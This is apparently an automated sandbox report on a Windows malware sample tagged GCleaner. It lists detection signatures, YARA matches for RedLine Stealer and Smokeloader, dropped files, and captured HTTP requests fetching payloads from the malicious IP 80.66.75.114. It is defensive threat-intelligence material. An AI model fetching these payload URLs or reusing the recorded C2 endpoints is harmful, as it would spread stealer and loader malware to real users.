Windows Analysis Report
SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe

Overview

General Information

Sample name: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Analysis ID: 1528791
MD5: b1281430b4f8c39015940b1e5dc9d569
SHA1: 58ba4506cdb786fc0b15d4717535e6463206f975
SHA256: dd8bd13e56f2c3c3b60e1c009caf5a3a66dce4eb59f32c4383a71a876dc0cb5a
Tags: exe, GCleaner
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe (PID: 3152 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe" MD5: B1281430B4F8C39015940B1E5DC9D569)
    • WerFault.exe (PID: 2656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 2708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1016 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 4908 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 5264 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 1464 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches (Source, Rule, Description, Author, Strings):

Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp
Rule: Windows_Trojan_RedLineStealer_ed346e4c
Description: unknown
Author: unknown
Strings:
  • 0x1118:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp
Rule: Windows_Trojan_Smokeloader_3687686f
Description: unknown
Author: unknown
Strings:
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: http://80.66.75.114/dll/key | Virustotal: Detection: 18%
Source: http://80.66.75.114/files/downloadu | Virustotal: Detection: 12%
Source: http://80.66.75.114/files/downloadw | Virustotal: Detection: 9%
Source: http://80.66.75.114/files/download3 | Virustotal: Detection: 10%
Source: http://80.66.75.114/soft/download9 | Virustotal: Detection: 15%
Source: http://80.66.75.114/files/download | Virustotal: Detection: 19%
Source: http://80.66.75.114/files/download? | Virustotal: Detection: 18%
Source: http://80.66.75.114/files/download9 | Virustotal: Detection: 14%
Source: http://80.66.75.114/soft/downloadE | Virustotal: Detection: 16%
Source: http://80.66.75.114/soft/download | Virustotal: Detection: 18%
Source: http://80.66.75.114/name | Virustotal: Detection: 19%
Source: http://80.66.75.114/files/downloadQ | Virustotal: Detection: 9%
Source: http://80.66.75.114/files/download4/files/download | Virustotal: Detection: 8%
Source: http://80.66.75.114/soft/downloadQ | Virustotal: Detection: 14%
Source: http://80.66.75.114/files/download4/files/downloadu | Virustotal: Detection: 17%
Source: http://80.66.75.114/files/downloadE | Virustotal: Detection: 8%
Source: http://80.66.75.114/soft/download14/soft/download | Virustotal: Detection: 14%
Source: http://80.66.75.114/files/downloadA | Virustotal: Detection: 11%
Source: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB | Virustotal: Detection: 18%
Source: http://80.66.75.114/files/downloadData | Virustotal: Detection: 15%
Source: http://80.66.75.114/dll/download | Virustotal: Detection: 18%
Source: http://80.66.75.114/files/downloadtem32 | Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | Virustotal: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe | ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe | Virustotal: Detection: 59%
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Virustotal: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] | Joe Sandbox ML: detected
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_004034B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_02173717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,0_2_02173717

Compliance

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Unpacked PE file: 0.2.SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe.400000.0.unpack
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 08 Oct 2024 08:08:38 GMT | Server: Apache/2.4.52 (Ubuntu) | Content-Disposition: attachment; filename="dll"; | Content-Length: 242176 | Keep-Alive: timeout=5, max=85 | Connection: Keep-Alive | Content-Type: application/octet-stream
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Tue, 08 Oct 2024 08:08:39 GMT | Server: Apache/2.4.52 (Ubuntu) | Content-Disposition: attachment; filename="soft"; | Content-Length: 1502720 | Keep-Alive: timeout=5, max=84 | Connection: Keep-Alive | Content-Type: application/octet-stream
Source: Joe Sandbox View | IP Address: 80.66.75.114 80.66.75.114
Source: unknown | TCP traffic detected without corresponding DNS query: 80.66.75.114
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401840
Source: global traffic | HTTP traffic detected: GET /name HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /add?substr=mixnine&s=three&sub=NOSUB HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dll/key HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /dll/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: 1 | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /files/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: C | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: d | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /soft/download HTTP/1.1 | Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 | Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 | Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 | User-Agent: s | Host: 80.66.75.114 | Connection: Keep-Alive | Cache-Control: no-cache
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUB
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2954051977.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBK
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2095732251.0000000000884000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2012468859.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.000000000087D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/download
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1989766414.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1807109955.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1966614112.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1829919159.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1875503102.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1921168119.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1852740816.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1898317579.0000000000883000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.1943970067.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/downloadxA
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/key
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000002.2953600985.0000000000851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.66.75.114/dll/keym7n

System Summary

Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1] F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: String function: 0217DE07 appears 38 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: String function: 0040DBA0 appears 39 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: String function: 10003160 appears 32 times
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2147353578.00000000035CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameY-Cleaner.exe4 vs SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, 00000000.00000003.2147704479.0000000002E61000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBunifu_UI_v1.5.3.dll4 vs SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.2953574713.00000000007AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.evad.winEXE@9/48@0/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_007AB146 CreateToolhelp32Snapshot,Module32First
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Code function: 0_2_00401840 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\name[1].htm
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3152
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | File created: C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Virustotal: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 740
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 748
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 776
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 788
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 924
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1284
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1508
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 1540
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: wuliwiyixenotafube.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
